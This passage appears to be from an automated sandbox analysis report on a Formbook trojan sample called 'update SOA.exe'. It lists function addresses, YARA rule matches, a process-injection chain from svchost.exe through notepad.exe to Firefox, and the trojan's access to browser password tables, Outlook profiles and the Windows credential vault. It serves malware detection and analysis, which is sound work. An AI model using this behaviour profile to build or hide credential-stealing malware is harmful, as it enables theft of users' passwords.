            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055B65AD4_2_055B65AD
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055AFC2D4_2_055AFC2D
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055CEA5D4_2_055CEA5D
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055AFE4D4_2_055AFE4D
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055ADECD4_2_055ADECD
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D8E4F65_2_04D8E4F6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D924465_2_04D92446
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD14605_2_04CD1460
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9F43F5_2_04D9F43F
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DA05915_2_04DA0591
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D7D5B05_2_04D7D5B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D975715_2_04D97571
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE05355_2_04CE0535
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D916CC5_2_04D916CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFC6E05_2_04CFC6E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CDC7C05_2_04CDC7C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9F7B05_2_04D9F7B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D047505_2_04D04750
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE07705_2_04CE0770
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE70C05_2_04CE70C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D8F0CC5_2_04D8F0CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D970E95_2_04D970E9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9F0E05_2_04D9F0E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D981CC5_2_04D981CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DA01AA5_2_04DA01AA
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEB1B05_2_04CEB1B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DAB16B5_2_04DAB16B
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D1516C5_2_04D1516C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CCF1725_2_04CCF172
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD01005_2_04CD0100
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D7A1185_2_04D7A118
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFB2C05_2_04CFB2C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D812ED5_2_04D812ED
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE52A05_2_04CE52A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D802745_2_04D80274
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DA03E65_2_04DA03E6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEE3F05_2_04CEE3F0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D2739A5_2_04D2739A
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CCD34C5_2_04CCD34C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9A3525_2_04D9A352
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9132D5_2_04D9132D
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FCF25_2_04D9FCF2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD0CF25_2_04CD0CF2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D80CB55_2_04D80CB5
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE0C005_2_04CE0C00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D59C325_2_04D59C32
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFFDC05_2_04CFFDC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CDADE05_2_04CDADE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CF8DBF5_2_04CF8DBF
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D91D5A5_2_04D91D5A
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE3D405_2_04CE3D40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D97D735_2_04D97D73
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEAD005_2_04CEAD00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9EEDB5_2_04D9EEDB
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9CE935_2_04D9CE93
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CF2E905_2_04CF2E90
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE9EB05_2_04CE9EB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE0E595_2_04CE0E59
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9EE265_2_04D9EE26
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD2FC85_2_04CD2FC8
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CECFE05_2_04CECFE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE1F925_2_04CE1F92
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FFB15_2_04D9FFB1
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D54F405_2_04D54F40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FF095_2_04D9FF09
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D00F305_2_04D00F30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D0E8F05_2_04D0E8F0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE38E05_2_04CE38E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CC68B85_2_04CC68B8
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE28405_2_04CE2840
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEA8405_2_04CEA840
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE29A05_2_04CE29A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DAA9A65_2_04DAA9A6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE99505_2_04CE9950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFB9505_2_04CFB950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CF69625_2_04CF6962
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D8DAC65_2_04D8DAC6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CDEA805_2_04CDEA80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D25AA05_2_04D25AA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D7DAAC5_2_04D7DAAC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FA495_2_04D9FA49
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D97A465_2_04D97A46
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D53A6C5_2_04D53A6C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D96BD75_2_04D96BD7
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D1DBF95_2_04D1DBF9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFFB805_2_04CFFB80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9AB405_2_04D9AB40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FB765_2_04D9FB76
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B91C105_2_02B91C10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B952B05_2_02B952B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B934A05_2_02B934A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B8CB205_2_02B8CB20
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BAB9505_2_02BAB950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B8ADC05_2_02B8ADC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B8CD405_2_02B8CD40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8E4675_2_04B8E467
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8E7FC5_2_04B8E7FC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8E3465_2_04B8E346
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8D8685_2_04B8D868
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8CB085_2_04B8CB08
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0553DD716_2_0553DD71
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0553BDF16_2_0553BDF1
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_05542C416_2_05542C41
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_055444D16_2_055444D1
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0555C9816_2_0555C981
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0553DB516_2_0553DB51
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_055462E16_2_055462E1
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D4EA12 appears 84 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D15130 appears 36 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04CCB970 appears 266 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D27E54 appears 88 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D5F290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 96 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 36 times
            Source: update SOA.exe, 00000000.00000003.2070693180.000000000481D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs update SOA.exe
            Source: update SOA.exe, 00000000.00000003.2070210673.0000000003DF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs update SOA.exe
            Source: update SOA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/5
            Source: C:\Users\user\Desktop\update SOA.exeFile created: C:\Users\user\AppData\Local\Temp\teerJump to behavior
            Source: update SOA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\update SOA.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002F1E000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3882543699.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3882543699.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2527421693.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: update SOA.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\update SOA.exeFile read: C:\Users\user\Desktop\update SOA.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\update SOA.exe "C:\Users\user\Desktop\update SOA.exe"
            Source: C:\Users\user\Desktop\update SOA.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\update SOA.exe"
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeProcess created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"
            Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\update SOA.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\update SOA.exe"Jump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeProcess created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: update SOA.exeStatic file information: File size 1401959 > 1048576
            Source: Binary string: notepad.pdbGCTL source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
